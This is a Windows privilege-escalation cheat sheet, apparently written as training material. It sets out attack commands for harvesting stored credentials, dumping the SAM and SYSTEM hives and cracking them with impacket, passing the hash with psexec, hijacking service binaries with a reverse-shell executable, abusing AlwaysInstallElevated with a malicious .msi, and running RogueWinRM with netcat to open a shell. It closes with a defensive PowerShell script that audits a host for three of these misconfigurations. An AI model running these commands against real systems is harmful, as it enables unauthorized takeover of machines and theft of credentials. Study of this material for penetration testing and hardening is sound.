Windows PrivEsc CheatSheet

Windows Privilege Escalation:

| Command/File | Notes |
|---|---|
| `C:\Unattend.xml`<br>`C:\Windows\Panther\Unattend.xml`<br>`C:\Windows\Panther\Unattend\Unattend.xml`<br>`C:\Windows\system32\sysprep.inf`<br>`C:\Windows\system32\sysprep\sysprep.xml` | Check these files for secrets such as passwords of domain users, including administrators. Installations deployed using Windows Deployment Services might contain these files with credentials hardcoded into them. |
| `type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` | Get the PowerShell history, similar to .bash_history on Linux; it may contain credentials passed as arguments to PowerShell cmdlets. |
| `cmdkey /list` | Check for saved credentials. |
| `runas /savecred /user:admin cmd.exe` | Run cmd.exe as a user using saved credentials identified with the `cmdkey /list` command. |
| `type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config \| findstr connectionString` | Check for database passwords stored in the connection string of web.config files. Note that the web.config file might be in a different location from the one shown here. |
| `reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s` | Check for stored proxy credentials. |
| `schtasks /query /tn vulntask /fo list /v` | List scheduled tasks on the host; focus on the "Task To Run" field of each scheduled task as well as its author. |
| `icacls` | Check the permissions associated with a file; useful for scheduled-task PrivEsc. |
| `schtasks /run /tn` | Run a scheduled task manually; note that you must have permission to do this. |
| `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`<br>`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` | Check whether Windows Installer files (.msi files) can be installed with SYSTEM privileges; both values must be set to 0x1 for this to work. |
| `msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi` | Execute a .msi payload on the host, exploiting the AlwaysInstallElevated feature. |
| `sc.exe qc` | Query the configuration of a service, e.g. BINARY_PATH_NAME and START_TYPE. |
| `reg query HKLM\SYSTEM\CurrentControlSet\Services\` | Query the registry for information about a specific service. If a DACL has been configured for the service, it is stored in a subkey called Security. |
| `icacls /grant Everyone:F`<br>`sc.exe stop ; sc.exe start` | Grant full control over a service executable, then restart the service whose executable we have modified. Note that in PowerShell we must use `sc.exe`, not just `sc`, since `sc` is an alias for Set-Content. |
| `"C:\Program Files\RealVNC\VNC Server\vncserver.exe"` | Example of an unquoted service path; unquoted service paths can be identified using sc.exe. |
| `accesschk64.exe /accepteula -qlc` | Use accesschk.exe from SysInternals to inspect the DACL of a service. Should the service DACL (not the service executable's DACL) allow you to modify the service configuration, you can reconfigure the service to point to any executable you need and run it under any account you prefer, including SYSTEM itself. |
| `sc.exe config binPath= "C:\Users\thm-unpriv\revshell.exe" obj= LocalSystem` | Reconfigure a service to use our malicious executable, having first verified with accesschk that the DACL lets us reconfigure it. We also specify the account the service runs as, in this case LocalSystem since it has the most privileges. |
| `whoami /priv` | Display the privileges associated with the current account. See https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants |
| `reg save hklm\system C:\Users\\system.hive`<br>`reg save hklm\sam C:\Users\\sam.hive` | If our user has SeBackup / SeRestore set, we can read and write any file on the system, ignoring any DACL in place. |
| `impacket-smbserver -smb2support -username -password public` | Create an SMB server using impacket on our attacking machine; we can then copy files from the target machine to our local machine using the `copy` command. Note that we must make a directory called first and set its permissions appropriately, e.g. `chmod 777`. |
| `impacket-secretsdump -sam sam.hive -system system.hive LOCAL` | Use impacket to dump password hashes from the exported SAM and SYSTEM hives. |
| `impacket-psexec -hashes @` | Use impacket to perform a pass-the-hash attack using the extracted password hashes. |
| `takeown /f`<br>`icacls /grant :F`<br>`copy cmd.exe` | Take ownership of a file. Note that this is only possible if SeTakeOwnershipPrivilege is available to the compromised user account; run `whoami /priv` to verify this. Being the owner of the file doesn't grant us full control over it, but as the owner you can assign yourself any permissions you need. To give your user full permissions over utilman.exe you can use the icacls command. This works well with executables like utilman.exe which run with SYSTEM privileges. |
| `RogueWinRM.exe -p "nc64.exe" -a "-e cmd.exe "` | Run the RogueWinRM exploit using a compromised service account with SeImpersonatePrivilege / SeAssignPrimaryToken privileges. The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used by the WinRM service, which exposes a PowerShell console to be used remotely over the network.<br>If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985/tcp and catch the authentication attempt made by the BITS service when it starts. If the attacker has SeImpersonate privileges, they can execute any command on behalf of the connecting user. |
| `wmic product get name,version,vendor` | Use the wmic tool to list the software installed on the target system and its versions. This command dumps the information it can gather on installed software. |
| https://github.com/itm4n/PrivescCheck<br>https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS<br>https://github.com/bitsadmin/wesng | Some useful tools for automating privilege escalation. Remember to run `Set-ExecutionPolicy Bypass -Scope process -Force` before attempting to run PowerShell scripts, in the event that the execution policy is restricted. |
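As an added defender-side audit (not part of the original cheat sheet), the following PowerShell script checks a host for the three misconfigurations the table relies on: AlwaysInstallElevated, unquoted service paths, and service binaries writable by low-privilege principals. It assumes Windows PowerShell 3 or later (for Get-CimInstance); the list of "low-privilege" principals is an assumption of the example and can be extended.

```powershell
function Test-AlwaysInstallElevated {
    # Both keys must hold AlwaysInstallElevated = 1 for msiexec to install as SYSTEM.
    foreach ($k in 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
                   'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if (-not $v -or $v.AlwaysInstallElevated -ne 1) { return $false }
    }
    return $true
}

function Get-UnquotedServicePath {
    # Unquoted command line with a space before the .exe (the vncserver.exe case above).
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and
        (($_.PathName -split '\.exe', 2)[0] -match ' ')
    } | Select-Object Name, StartName, PathName
}

function Get-WritableServiceBinary {
    # Service executables that low-privilege principals may modify (assumed list).
    $lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # The executable is either the quoted first token or everything up to the first .exe
        $m = [regex]::Match([string]$svc.PathName, '^"([^"]+)"|^(.+?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }   # binary missing or ACL unreadable as this user
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $_.IdentityReference.Value -and
            $_.FileSystemRights -match 'Write|Modify|FullControl'
        }
        if ($weak) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Binary = $exe
                               Writable = ($weak.IdentityReference.Value -join ', ') }
        }
    }
}

"AlwaysInstallElevated enabled: $(Test-AlwaysInstallElevated)"
Get-UnquotedServicePath   | Format-Table -AutoSize
Get-WritableServiceBinary | Format-Table -AutoSize
```

Run it from an elevated prompt to see every service's ACL; as a standard user it reports only what that user can read, which is still a useful view of what an unprivileged account could reach.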